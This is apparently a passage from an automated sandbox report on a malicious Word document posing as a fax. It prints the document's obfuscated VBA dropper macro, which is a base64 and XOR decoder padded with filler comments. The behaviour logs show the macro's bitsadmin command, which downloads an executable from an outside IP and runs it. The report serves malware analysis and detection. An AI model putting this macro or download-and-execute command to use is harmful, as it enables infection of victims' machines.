  v240427 = v240427 + "NEAxMjJAOUAxN0AxMjFAMjlANjJANDdAMTVANTlANUA0MUAxMjBANTlANTlANDFAMTJANTFAMzVAN0A0OUAyNkA2MkA2QDhAMTBAMzhAMThAMzhAMzlAMTIzQDQwQDEyMUAxM0AzMkA0MUAyOEAzOUA2MkAyQDhAMTE0QDUwQDE3QDE5QDVAMTIyQDQxQDI4QDMwQDQ0QDQyQDMzQDJANDRAMUAzOEAxQDU5QDQ3QDNANUAzNUAxN0AxMkAxMjJANTlANDFAMzRAMTBANjFAMThAMTIxQDExNEA2M0A0MEAxMkA1MUAzOUA0N0AxMkAzMEA0NEA0MkAzM0AyQDQ0QDFAMzRAMThANDRANDBAMTIwQDI1QDM1QDQwQDM3QDI2QDQ0QDFAMjlAMjVA"
  v240427 = v240427 + "MTNAMzFAMjlAMTBAMzlAN0A0OUAxNEA2MkAxN0AxOUAzNUAzOUA0NkAzQDM1QDEyNw=="
  
  v575024 = Str(num_x)
  'Officia sint consequat nulla do duis pariatur sint duis nulla adipisicing laboris dolor. Laborum duis exercitation voluptate voluptate.
  'Consequat amet ea amet excepteur nostrud sunt est sit anim id quis commodo ea incididunt.
  'Tempor consectetur occaecat eu ipsum dolor veniam sit duis adipisicing duis sit et id.
  'Dolor aliqua ut nisi veniam qui elit. Nostrud do laborum eiusmod duis magna fugiat sit fugiat Lorem occaecat.
  'Anim ad cillum et dolore et pariatur ut elit commodo dolor voluptate laborum. Enim veniam pariatur cupidatat id esse est quis dolore nulla fugiat officia voluptate ea anim.
  
  v152021 = Val(Mid(v575024, 2, 2))
  'Esse ea ipsum nulla aute nostrud aute eiusmod aliquip id. Magna duis exercitation do et id.
  'Est incididunt consequat nostrud eiusmod laborum esse minim eu deserunt duis deserunt.
  'Reprehenderit et dolore veniam ea cupidatat sint incididunt aute consectetur velit dolore laboris elit. Dolore elit fugiat id do.
  
  v615031 = Asc(Mid(v758456, v152021, 1))
  v135778 = v349656 + v877340
  'Fugiat labore incididunt velit esse consectetur sunt Lorem dolor enim sunt.
  v135778 = v135778 + v349656
  v349656 = Tan(v349656)
  'Eiusmod anim culpa amet est reprehenderit sit consequat.
  
  v572717 = f245997(v240427)
  v349656 = Cos(v349656)
  'Do duis ullamco aute ullamco fugiat.
  'Occaecat tempor id qui reprehenderit Lorem duis veniam ipsum laboris quis laborum duis. Quis do in anim nostrud irure.
  'Eiusmod sint esse qui laboris sit ad.
  
  v847141 = Split(v572717, "@")
  'Officia aliquip dolore dolor culpa nulla anim incididunt consequat voluptate ipsum. Magna in ex mollit laborum voluptate qui qui id consectetur enim elit exercitation minim nulla.
  v349656 = v562180 + v877340
  v135778 = v135778 + v562180
  'Consectetur magna ullamco culpa nostrud commodo occaecat quis aliquip proident.
  
  For i = 0 To (UBound(v847141) - LBound(v847141)) Step 1
  v664867 = (v847141(i) Xor v615031)
  v5727172 = v5727172 + CStr(Chr(v664867))
  Next i
  v562180 = Int(v877340)
  v135778 = Asc(v71433)
  'Elit voluptate et ullamco amet pariatur aliquip mollit.
  v877340 = Sqr(v877340)
  'Voluptate nisi ullamco aliqua mollit et cillum excepteur officia deserunt proident elit id.
  
  v877340 = v562180 + v877340
  'Consequat officia cillum tempor velit excepteur aliquip reprehenderit dolore ad deserunt. Culpa dolore culpa deserunt labore magna excepteur mollit mollit veniam fugiat non esse magna.
  v877340 = v349656 + v349656
  v877340 = v349656 + v349656
  
  v572717 = f245997(v5727172)
  v135778 = v135778 - v562180
  'Sint ut enim est occaecat et esse.
  'Aliquip incididunt ullamco aliqua nostrud proident laborum eiusmod ad commodo irure. Dolor est ea excepteur est non ipsum sunt laboris et.
  
  v135778 = v349656 + v877340
  v135778 = v562180 + v562180
  v349656 = v349656 + v349656
  'Cupidatat irure cupidatat sunt commodo veniam do consectetur ut.
  
  A1DX = Shell(Left(v572717, Len(v572717) - 2), 0)
  'Sint et minim ipsum sint nisi ad Lorem cillum quis officia cupidatat. Mollit nulla ut aliqua dolore ex laboris occaecat excepteur sit occaecat commodo.
  v135778 = v135778 + v349656
  v349656 = v135778 + v135778
  'Tempor do ut adipisicing duis quis do ipsum deserunt.
  v562180 = Abs(v562180)
  
  v562180 = v349656 + v135778
  v562180 = Sqr(v349656)
  'Sint aliqua velit sunt exercitation duis occaecat consequat.
  
  v562180 = Sgn(v877340)
  v877340 = v877340 + v349656
  v562180 = RGB(194, 185, 103)
  'Est Lorem qui cupidatat velit.
  'Lorem quis enim non esse fugiat.
  
  AS1 = 48
  'Minim adipisicing mollit ullamco aliqua enim nulla dolore ullamco irure irure.
  v135778 = v135778 + v349656
  'Enim qui culpa deserunt magna. Sunt ullamco incididunt sint laboris velit.
  'Irure Lorem aliquip ea magna irure est. Ullamco est magna duis irure consectetur.
  v135778 = v562180 + v562180
  
  v877340 = v562180 + v135778
  v349656 = v562180 + v349656
  'Culpa ad irure aliqua reprehenderit enim exercitation ipsum exercitation tempor adipisicing mollit cupidatat. Ad sunt voluptate cillum tempor incididunt commodo sunt ea aliqua irure velit do minim aliquip.
  
  'Aute ullamco elit nostrud magna cillum voluptate irure esse mollit incididunt dolor velit non. Consequat veniam ut amet est.
  v349656 = v877340 + v562180
  'Incididunt minim ullamco dolore duis non exercitation consequat.
  
  'Nulla ut eiusmod amet deserunt ut sunt est esse ullamco magna. Proident non eiusmod anim labore proident laboris minim ea anim enim culpa.
  'Incididunt velit ad id deserunt. Ipsum laborum laboris amet adipisicing ipsum velit anim dolore dolore culpa irure.
  'Aliquip sunt ad ex sunt aute tempor do amet.
  
  'Consequat non ex sint enim duis tempor nisi est anim excepteur occaecat qui.
  'Ex officia laboris enim anim ex fugiat ipsum. Magna ipsum nisi nulla aute aute id enim irure et elit quis.
  'Ex fugiat fugiat elit pariatur eu laboris laboris ut laboris magna dolore adipisicing.
  v135778 = v562180 - v135778
  
  'Adipisicing et nostrud excepteur est voluptate non. Dolore id ipsum laborum magna elit aliquip quis.
  'Sunt in consequat dolor exercitation mollit aliquip Lorem est sint consectetur sunt. Aute labore exercitation commodo incididunt incididunt velit culpa enim laboris qui non sint occaecat non.
  v349656 = v135778 + v562180
  'Minim exercitation culpa laborum ex id. Aliquip exercitation ex laborum ipsum anim.
  v135778 = v349656 + v877340
  
  End Function
  
  Function f245997(ByVal v100243)
  On Error Resume Next
  Dim v269444 As Variant, v376987 As Variant, v842208 As Variant, v330126 As Variant, v151497 As String, v668744 As String, v335244 As String, Var_5 As Variant
  v151497 = "V29fCUC1YatOjF9SVlkFdXokxfcKf9axvix8QEZZNSEnQD3marcfNJHpp73VSj9BkUiL75ZhNl4KYPb2Lo3a1IUA7devkK2sSoJAsYWQeqSs81kjjZZni7jyg9wTSgkLxxQW8zVwxwKYbvFOivPkWSm3518d2YAyEc37r46OBxrKDfFWHZcEwIgFq5dh7rggZDsi0qSNwYliTDntOpbiF7DZjHWUk4gKFBFB6EFX5a6FcKIR60yxrJCQhsvZkTkJ3g0J3OVAPgwjByViGvOFxESXitzLz1isyVQt758Si2yBmJcogorwm4SWSEecbNj6n9rb5CIg"
  v335244 = "CWJ9vAgSyr52WbXtI278AXLk3RPATJ6AkNVnIp8AymgG4EDXh5AhgZz9hAFP87xAuovrxr8NkDuvOST0Ldu9JjlDuFcANaP183a8rdUuTBOUtwm6A9XGrYvtDX7x5bhpirPaSl8aSWFv24fk1K5hJlEj2TIpNjXfyKWVpdxRQ7hcsfVLTDY6CGSg3sG4tIm90NB1XovSxBa6C8gcgtq6GDWkL"
  v668744 = "Jhlk3JfDkGkvuoiSJQuIiYhXTW94X6xzKhFkuHhF7Kem2PzLbQABDIFPAlmGb6Gr7Dlur28AmYhEg0Q2onfbasnrwJmm4LSJSrwhSqdI7LtcSj6SOUV8qOXQLesefEk"
  v269444 = "91"
  v376987 = "27"
  v330126 = "50"
  v842208 = "31"
  v216871 = "60"
  v330126 = v842208 - v269444
  v216871 = v269444 - v269444
  'Veniam culpa tempor duis laborum cillum aute excepteur mollit culpa.
  v376987 = v216871 + v842208
  'Consequat in velit nostrud sit commodo ut enim. Fugiat laborum do veniam reprehenderit consectetur ullamco et nisi in quis.
  
  Dim v814889 As String
  'Exercitation aute anim in pariatur veniam laboris quis. Labore est officia id voluptate nisi fugiat reprehenderit cupidatat quis aute.
  v269444 = v269444 + v842208
  'Magna elit reprehenderit cillum et nulla eiusmod eiusmod. Magna eiusmod dolore amet laboris pariatur sunt anim reprehenderit anim qui fugiat.
  
  v814889 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim v709711
  Dim v272008
  v842208 = Tan(v269444)
  v330126 = v842208 + v330126
  'Ad sit anim magna nulla. Ipsum magna id aliqua est culpa excepteur officia et dolor et et.
  v269444 = v269444 + v330126
  v330126 = v269444 - v376987
  
  Dim v776342, v754466
  Dim v442221, v234125, v97083, v875027
  Dim v861160, v452150, Byte3
  'Fugiat labore do elit eu.
  v216871 = Sqr(v330126)
  'Nisi quis est ea eu culpa eiusmod reprehenderit cupidatat nisi.
  
  If Len(v100243) Mod 4 > 0 Then v100243 = v100243 & String(4 - (Len(v100243) Mod 4), " ")
  v709711 = ""
  v376987 = v216871 + v216871
  'Est aute est mollit fugiat ut ex ut esse culpa.
  v376987 = v216871 + v269444
  v376987 = v216871 + v269444
  
  For v272008 = 1 To Len(v100243) Step 4
  v754466 = ""
  v776342 = Mid(v100243, v272008, 4)
  'Ipsum adipisicing amet duis eiusmod est anim veniam nisi eu nostrud. Et ea elit cillum pariatur amet fugiat sit minim elit ut dolore dolore.
  v376987 = Abs(v216871)
  'Incididunt sunt occaecat fugiat mollit do.
  'Incididunt duis magna est eu ad qui labore ipsum dolore ullamco nisi eu dolor.
  
  v442221 = InStr(v814889, Mid(v776342, 1, 1)) - 1
  v234125 = InStr(v814889, Mid(v776342, 2, 1)) - 1
  v216871 = v330126 + v216871
  'Cillum officia ea aliquip duis minim qui.
  v376987 = v842208 + v376987
  v330126 = v330126 + v269444
  'Nulla ut consequat ut ipsum in deserunt culpa velit minim cillum id. Non officia ipsum ad officia ullamco fugiat duis enim Lorem et enim.
  
  v97083 = InStr(v814889, Mid(v776342, 3, 1)) - 1
  v875027 = InStr(v814889, Mid(v776342, 4, 1)) - 1
  v861160 = Chr(((v234125 And 48) \ 16) Or (v442221 * 4) And &HFF)
  v452150 = v754466 & Chr(((v97083 And 60) \ 4) Or (v234125 * 16) And &HFF)
  'Voluptate quis magna do ipsum sunt ad sunt excepteur dolore laboris consequat magna mollit. Cupidatat cillum laborum laboris amet ex amet ad adipisicing.
  'Nisi ipsum officia do eiusmod.
  v376987 = Tan(v842208)
  v216871 = v842208 - v269444
  
  Byte3 = Chr((((v97083 And 3) * 64) And &HFF) Or (v875027 And 63))
  v754466 = v861160 & v452150 & Byte3
  'Ad ut adipisicing culpa aute non occaecat incididunt quis ex ut ad eu. Lorem in laboris ea laborum aute est culpa incididunt quis duis officia laborum dolor nostrud.
  v216871 = v842208 - v842208
  'Nulla anim ad culpa ea. Esse enim irure ea Lorem ut magna amet duis.
  'Lorem et occaecat dolore velit et. Sit aliqua fugiat cupidatat sunt aliqua fugiat et tempor aute.
  v842208 = Int(v216871)
  
  v709711 = v709711 + v754466
  Next
  v842208 = v330126 + v216871
  v216871 = v216871 + v330126
  v330126 = v269444 + v216871
  'Do Lorem adipisicing duis eu in sint excepteur ipsum eu quis excepteur consequat. Fugiat et aliqua tempor eiusmod esse pariatur consectetur amet tempor exercitation laborum deserunt irure.
  'Nulla excepteur nulla consequat laborum fugiat nulla do aliquip pariatur commodo eiusmod ex.
  
  f245997 = Left(v709711, Len(v709711) - 1)
  End Function
  
  Function f624191() As Long
  On Error Resume Next
  Dim v589425 As String, v942571 As String, v88596 As Variant, v92129 As Variant, v364689 As String, v711536 As Variant, v536710 As Variant, Var_5 As Variant
  v942571 = "EgZKyNWnCPmGF9QUWtnsjpaO96BrRkRifJicfZzfnL2jBX3A0Vt1r1ZFRzTRSns0V8HpvYYE3F9trjomUzT1djxO1SbWFNg349CvHmoOifF3NCWREkZ85SXR7umpdBgPZKQQXDVh4HQBXxJVUCERoleJRbIBhD6pzX5J2h8eyatF5QzuuK1AnpJv9iw5K5H3gLn7sgC1AooZdIvOOigWbqswUCCC3rKdYdoLDBvhAgtQ8l85AlSfSBHCcII6pbaeICyRVhPZZ3FLQJwePyjiKuXSkj7NZXR8nusLIuK5ufHbQ1dFW80X7VyV8ZXEe0iGHZ0JErHa2pzkI8k8RJLzK7jT2Xeagk"
  v589425 = "bLNvyNY2cc1ahUXBInXeePR5PxJmPikDpOrmy91d0cAjgBWo3FZ4uhvY4wn2ZQCn3UGKkkjqRc3oIi8fKDhgYSPscXeOdyW2bxJoevWeQyJp1FFC889c3oukDV444yoViRhW4qlHtDpPvOzyczQj4sisuRNBQ7SugnDBGRq0mosvWHfXmegc9RQFygzG6PmHi94Ow3aaUwhsaFcBC7pWR5DVg1lpTX4XIbwNy8Q7XnbH5Vytj41avGbbGrQSHS2qISQmETHf7PxvGJ1ONpaVuffxmqH0S2jjTurEEgUKEjViyOmd8RxCY0WUHPrbAKQjtvVRmoQTCmuh7WKPvP7bhSBIXLUeepgrwoCve0w0mix14HWkd25dDLsHUAoTylma1UtHxxdNEJ78ltQQGgc6a5rxit"
  v364689 = "ZtfYBoTlYuZ3ZHAOBm67PzsT0dinL7YGdgglueNslcQsir7C6Q5YFeFwN5bCyb20KtHAg4uhVm9WRtT2okJpdIa4uFLmwz2etdfsER0friGemY3lLD5YQB8Ns7RJXxpU0esKKs7qsBXjIFNUNNRb8"
  v536710 = "97"
  v711536 = "32"
  v88596 = "10"
  v92129 = "21"
  v647557 = "42"
  'Officia eu id eu cupidatat duis aliquip. Commodo deserunt anim officia excepteur id excepteur enim ut sint ut ut excepteur aliquip voluptate.
  v92129 = v536710 - v647557
  v536710 = v536710 + v92129
  
  f624191 = 1
  End Function"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Creates a writable file in a temporary directory
  
  details
  
  "WINWORD.EXE" created file "%TEMP%\~DF4B30B65BF4E6A9A3.TMP"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\10MU_ACBPIDS_S-1-5-5-0-58974"
  "Global\552FFA80-3393-423d-8671-7BA046BB5906"
  "Local\ZonesCounterMutex"
  "Local\ZonesCacheCounterMutex"
  "Local\ZoneAttributeCacheCounterMutex"
  "Local\10MU_ACB10_S-1-5-5-0-58974"
  "Local\ZonesLockedCacheCounterMutex"
  "Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-58974"
  "\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-58974"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Loads rich edit control libraries
  
  details
  
  "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 68AB0000
  
  source
  
  Loaded Module
- Logged script engine calls
  
  details
  
  "WINWORD.EXE" called ".Shell" with result: "1" ...
  
  source
  
  API Call
  
  relevance
  
  10/10
- Process launched with changed environment
  
  details
  
  Process "cmd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.C00="4""
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
- Runs shell commands
  
  details
  
  "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe" on 2017-12-7.16:37:02.781
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
- Scanning for window names
  
  details
  
  "WINWORD.EXE" searching for class "mspim_wnd32"
  "WINWORD.EXE" searching for class "NetUICtrlNotifySink"
  "WINWORD.EXE" searching for class "REListbox20W"
  "WINWORD.EXE" searching for class "OfficeTooltip"
  "WINWORD.EXE" searching for class "MsoCommandBarPopup"
  "WINWORD.EXE" searching for class "MSOBALLOON"
  "WINWORD.EXE" searching for class "MsoHelp10"
  "WINWORD.EXE" searching for class "AgentAnim"
  
  source
  
  API Call
  
  relevance
  
  10/10
- Spawns new processes
  
  details
  
  Spawned process "cmd.exe" with commandline "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /create /download j2" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /resume j2" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /complete j2" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Creates new processes
  
  details
  
  "WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1288)
  
  source
  
  API Call
  
  relevance
  
  8/10
- Dropped files
  
  details
  
  "b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Dec 7 23:35:52 2017 mtime=Thu Dec 7 23:35:52 2017 atime=Thu Dec 7 23:36:10 2017 length=181248 window=hide"
  "~$644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc" has type "data"
  "urlref_http185.81.113.106L33LMj7.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  "index.dat" has type "data"
  "~WRS{70621F97-B98F-44BB-BE39-FADAA03A35C7}.tmp" has type "data"
  "~$Normal.dotm" has type "data"
  
  source
  
  Binary File
  
  relevance
  
  3/10
- Opens the MountPointManager (often used to detect additional infection locations)
  
  details
  
  "WINWORD.EXE" opened "\Device\MountPointManager"
  
  source
  
  API Call
  
  relevance
  
  5/10
- Touches files in the Windows directory
  
  details
  
  "WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
  "WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
  "WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
  "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
  "WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
  "WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
  
  source
  
  API Call
  
  relevance
  
  7/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
  Pattern match: "http://185.81.113.106/indexsdfgfdsafdefsdd.php"
  Pattern match: "http://185.81.113.106/L33LMj7.exe"
  
  source
  
  File/Memory
  
  relevance
  
  10/10
System Security
- Hooks API calls
  
  details
  
  "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
  "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
  "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
  "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
  "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
- Queries sensitive IE security settings
  
  details
  
  "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  
  source
  
  Registry Access
  
  relevance
  
  8/10
Unusual Characteristics
- Installs hooks/patches the running process
  
  details
  
  "WINWORD.EXE" wrote bytes "b800000000663d33c0ba3400480068dcf57868c3" to virtual address "0x057FD10C"
  "WINWORD.EXE" wrote bytes "e99a54b9ef" to virtual address "0x75FA3E59" ("SysFreeString@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "b811110000663d33c0ba0cd07e0568dcf57868c3" to virtual address "0x057FD12C"
  "WINWORD.EXE" wrote bytes "b800000000663d33c0bab400480068dcf57868c3" to virtual address "0x057FD14C"
  "WINWORD.EXE" wrote bytes "b800000000663d33c0baf400480068dcf57868c3" to virtual address "0x057FD16C"
  "WINWORD.EXE" wrote bytes "b800000000663d33c0ba3401480068dcf57868c3" to virtual address "0x057FD18C"
  "WINWORD.EXE" wrote bytes "e96033baef" to virtual address "0x75FA4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "b800000000663d33c0ba7401480068dcf57868c3" to virtual address "0x057FD1AC"
  "WINWORD.EXE" wrote bytes "ccf34baf" to virtual address "0x68AF9904" (part of module "RICHED20.DLL")
  "WINWORD.EXE" wrote bytes "e9c53207ef" to virtual address "0x77076143" ("OleLoadFromStream@OLE32.DLL")
  "WINWORD.EXE" wrote bytes "0883c40c" to virtual address "0x688F1F20" (part of module "GKWORD.DLL")
  "WINWORD.EXE" wrote bytes "e92399bcef" to virtual address "0x75FA5DEE" ("VariantChangeType@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "e99e489def" to virtual address "0x76133D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  "WINWORD.EXE" wrote bytes "86bdfbe1" to virtual address "0x615942C4" (part of module "VBE7.DLL")
  "WINWORD.EXE" wrote bytes "259528af" to virtual address "0x66D678E4" (part of module "OART.DLL")
  "WINWORD.EXE" wrote bytes "904b45af" to virtual address "0x68C010AC" (part of module "MSPTLS.DLL")
  "WINWORD.EXE" wrote bytes "60cffdaf" to virtual address "0x2F611B94" (part of module "WINWORD.EXE")
  "WINWORD.EXE" wrote bytes "df4d27af" to virtual address "0x6957F530" (part of module "WWLIB.DLL")
  "WINWORD.EXE" wrote bytes "e93655baef" to virtual address "0x75FA3EAE" ("VariantClear@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "b800000000663d33c0baf4ff470068dcf57868c3" to virtual address "0x057FD0EC"
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
- Reads information about supported languages
  
  details
  
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
  "WINWORD.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "NUMSHAPE")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408")
  
  source
  
  Registry Access
  
  relevance
  
  3/10

File Details

All Details:

fax-120717_094384372834792.doc

Filename: fax-120717_094384372834792.doc
Size: 177KiB (181248 bytes)
Type: doc office
Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: adm, Template: Normal.dotm, Last Saved By: adm, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Thu Sep 28 14:04:00 2017, Last Saved Time/Date: Wed Sep 27 14:54:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Architecture
: WINDOWS
SHA256
: b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17
MD5
: 9707cbff1947e82bc5cbf6de5d0eb880
SHA1
: 298ca21d039307d977791d47b6eeb8e0dcddf7a2

Resources

Icon

Visualization

Input File (PortEx)

Classification (TrID)

54.2% (.DOC) Microsoft Word document
32.2% (.DOC) Microsoft Word document (old ver.)
13.5% (.) Generic OLE2 / Multistream Compound File

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 8 processes in total (System Resource Monitor).

WINWORD.EXE /n "C:\b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc" (PID: 3072)
- cmd.exe /c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe (PID: 3768)
  - bitsadmin.exe bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe (PID: 3728)
  - bitsadmin.exe bitsadmin /create /download j2 (PID: 3808)
  - bitsadmin.exe bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt (PID: 3848)
  - bitsadmin.exe bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 (PID: 3868)
  - bitsadmin.exe bitsadmin /resume j2 (PID: 3936)
  - bitsadmin.exe bitsadmin /complete j2 (PID: 1512)

Logged Script Calls	Logged Stdout	Extracted Streams	Memory Dumps
Reduced Monitoring	Network Activityy	Network Error	Multiscan Match

Network Analysis

DNS Requests

No relevant DNS requests were made.

Contacted Hosts

No relevant hosts were contacted.

HTTP Traffic

No relevant HTTP requests were made.

Extracted Strings

Download All Memory Strings (4.2KiB)

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ZRoot EntryF[7QData

